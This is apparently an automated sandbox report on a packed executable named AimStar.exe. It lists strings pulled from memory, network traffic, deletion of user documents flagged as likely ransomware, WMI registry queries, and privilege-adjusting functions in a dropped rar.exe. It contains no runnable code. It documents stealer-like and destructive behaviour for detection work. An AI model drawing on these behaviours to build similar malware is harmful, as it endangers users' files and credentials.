Source: AimStar.exe, 00000002.00000002.2415755951.000002020E07C000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2412961624.000002020D354000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216216669.000002020D354000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2404357827.000002020D354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 0000000C.00000002.2164613926.000002169FD97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2287372527.000002A6C80AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2287372527.000002A6C81EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000039.00000002.2230160700.000002A6B9634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000039.00000002.2230160700.000002A6B9634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
Source: AimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
Source: AimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
Source: AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2411216305.000002020CFB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: AimStar.exe, 00000002.00000003.2049843028.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2029404019.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2048372597.000002020C5FC000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2048974996.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2030161372.000002020C602000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2048580091.000002020C5FD000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2047069115.000002020C5FD000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2029008923.000002020C5E4000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2028931603.000002020C5F6000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2025783196.000002020A76B000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051383625.000002020C601000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2046920935.000002020C5FC000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.dr	String found in binary or memory: https://peps.python.org/pep-0205/
Source: AimStar.exe, 00000002.00000002.2419478466.00007FF8A8CD9000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: AimStar.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: AimStar.exe, 00000002.00000003.2164479529.000002020D2EA000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2167989840.000002020D2EB000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2412312038.000002020D2EC000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2214479824.000002020D2EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: AimStar.exe, 00000002.00000003.2133349220.000002020D2F1000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137253996.000002020D372000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AimStar.exe, 00000002.00000003.2133349220.000002020D2F1000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137253996.000002020D372000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2054517827.000002020C643000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: AimStar.exe, 00000002.00000003.2404700366.000002020CAF5000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216622964.000002020CAF5000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://weibo.com/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.ca/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.co.uk/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.fr/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DAB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.avito.ru/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bbc.co.uk/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ctrip.com/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ifeng.com/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iqiyi.com/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.leboncoin.fr/
Source: AimStar.exe, 00000002.00000003.2164479529.000002020D2EA000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2415391587.000002020DAD8000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2167989840.000002020D2EB000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2412312038.000002020D2EC000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2214479824.000002020D2EA000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2415755951.000002020E070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: AimStar.exe, 00000002.00000003.2133349220.000002020D2F1000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137608834.000002020D2D4000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137253996.000002020D372000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: AimStar.exe, 00000002.00000003.2133349220.000002020D2F1000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137253996.000002020D372000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: AimStar.exe, 00000002.00000003.2133349220.000002020D2F1000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137253996.000002020D372000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: AimStar.exe, 00000002.00000003.2147551669.000002020D3B6000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2147551669.000002020D3C6000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2143000135.000002020D3B6000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2153930314.000002020D3B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: AimStar.exe, 00000002.00000003.2133349220.000002020D2F1000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137253996.000002020D372000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137608834.000002020D2C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon-196x196.2af054fea211.png
Source: AimStar.exe, 00000002.00000002.2409740452.000002020CA73000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2137509885.000002020D2EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: AimStar.exe, 00000002.00000002.2415755951.000002020E0A4000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216216669.000002020D354000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmp, AimStar.exe, 00000002.00000002.2418850491.00007FF8A871A000.00000004.00000001.01000000.0000000F.sdmp, libcrypto-3.dll.0.dr	String found in binary or memory: https://www.openssl.org/H
Source: AimStar.exe, 00000002.00000002.2419478466.00007FF8A8CD9000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: AimStar.exe, 00000002.00000003.2056832978.000002020CA80000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020CA73000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2056720050.000002020CD09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DAB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\AimStar.exe	File deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\GRXZDKKVDB.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\PALRGUCVEH.pdf	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\GIGIYTFFYT.mp3	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\GIGIYTFFYT.mp3	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File deleted: C:\Users\user\AppData\Local\Temp\ \Common Files\Desktop\NVWZAPQSQL.docx	Jump to behavior

Source: cmd.exe

Process created: 63

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe

Code function: 88_2_00007FF71396D2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

88_2_00007FF71396D2C0

Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe

Code function: 88_2_00007FF71399B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,

88_2_00007FF71399B57C

Source: C:\Windows\System32\SIHClient.exe	File created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP97EB.tmp
Source: C:\Windows\System32\SIHClient.exe	File created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP823D.tmp

Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F669D4	0_2_00007FF710F669D4
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F48BD0	0_2_00007FF710F48BD0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F41000	0_2_00007FF710F41000
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F5DACC	0_2_00007FF710F5DACC
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F6411C	0_2_00007FF710F6411C
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F60938	0_2_00007FF710F60938
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F58154	0_2_00007FF710F58154
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F519B4	0_2_00007FF710F519B4
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F521D4	0_2_00007FF710F521D4
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F53A14	0_2_00007FF710F53A14
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F65C70	0_2_00007FF710F65C70
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F63C80	0_2_00007FF710F63C80
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F52C80	0_2_00007FF710F52C80
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F66488	0_2_00007FF710F66488
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F60938	0_2_00007FF710F60938
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F4A4E4	0_2_00007FF710F4A4E4
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F4A34B	0_2_00007FF710F4A34B
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F51BC0	0_2_00007FF710F51BC0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F65EEC	0_2_00007FF710F65EEC
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F59F10	0_2_00007FF710F59F10
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F4AD1D	0_2_00007FF710F4AD1D
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F55DA0	0_2_00007FF710F55DA0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F51DC4	0_2_00007FF710F51DC4
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F5E5E0	0_2_00007FF710F5E5E0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F53610	0_2_00007FF710F53610
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F49870	0_2_00007FF710F49870
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F618E4	0_2_00007FF710F618E4
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F5DF60	0_2_00007FF710F5DF60
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F69798	0_2_00007FF710F69798
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F517B0	0_2_00007FF710F517B0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F51FD0	0_2_00007FF710F51FD0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F58804	0_2_00007FF710F58804
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F669D4	2_2_00007FF710F669D4
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F41000	2_2_00007FF710F41000
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F5DACC	2_2_00007FF710F5DACC
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F6411C	2_2_00007FF710F6411C
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F60938	2_2_00007FF710F60938
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F58154	2_2_00007FF710F58154
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F519B4	2_2_00007FF710F519B4
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F521D4	2_2_00007FF710F521D4
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F53A14	2_2_00007FF710F53A14
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F65C70	2_2_00007FF710F65C70
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F63C80	2_2_00007FF710F63C80
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F52C80	2_2_00007FF710F52C80
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F66488	2_2_00007FF710F66488
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F60938	2_2_00007FF710F60938
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F4A4E4	2_2_00007FF710F4A4E4
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F4A34B	2_2_00007FF710F4A34B
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F51BC0	2_2_00007FF710F51BC0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F48BD0	2_2_00007FF710F48BD0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F65EEC	2_2_00007FF710F65EEC
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F59F10	2_2_00007FF710F59F10
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F4AD1D	2_2_00007FF710F4AD1D
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F55DA0	2_2_00007FF710F55DA0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F51DC4	2_2_00007FF710F51DC4
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F5E5E0	2_2_00007FF710F5E5E0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F53610	2_2_00007FF710F53610
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F49870	2_2_00007FF710F49870
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F618E4	2_2_00007FF710F618E4
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F5DF60	2_2_00007FF710F5DF60
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F69798	2_2_00007FF710F69798
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F517B0	2_2_00007FF710F517B0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F51FD0	2_2_00007FF710F51FD0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F58804	2_2_00007FF710F58804
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8200330	2_2_00007FF8A8200330
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8151950	2_2_00007FF8A8151950
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8152270	2_2_00007FF8A8152270
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8151300	2_2_00007FF8A8151300
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8719060	2_2_00007FF8A8719060
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87B29E0	2_2_00007FF8A87B29E0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87D4CF0	2_2_00007FF8A87D4CF0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87CCFB0	2_2_00007FF8A87CCFB0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87692C0	2_2_00007FF8A87692C0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87722E0	2_2_00007FF8A87722E0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8795910	2_2_00007FF8A8795910
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8766940	2_2_00007FF8A8766940
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A875FA20	2_2_00007FF8A875FA20
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8779A30	2_2_00007FF8A8779A30
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87BBB80	2_2_00007FF8A87BBB80
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8759BA0	2_2_00007FF8A8759BA0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87B4BB0	2_2_00007FF8A87B4BB0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87A6BD0	2_2_00007FF8A87A6BD0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A87ACCD0	2_2_00007FF8A87ACCD0
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A878CCE9	2_2_00007FF8A878CCE9
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8753C10	2_2_00007FF8A8753C10
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A876CC40	2_2_00007FF8A876CC40
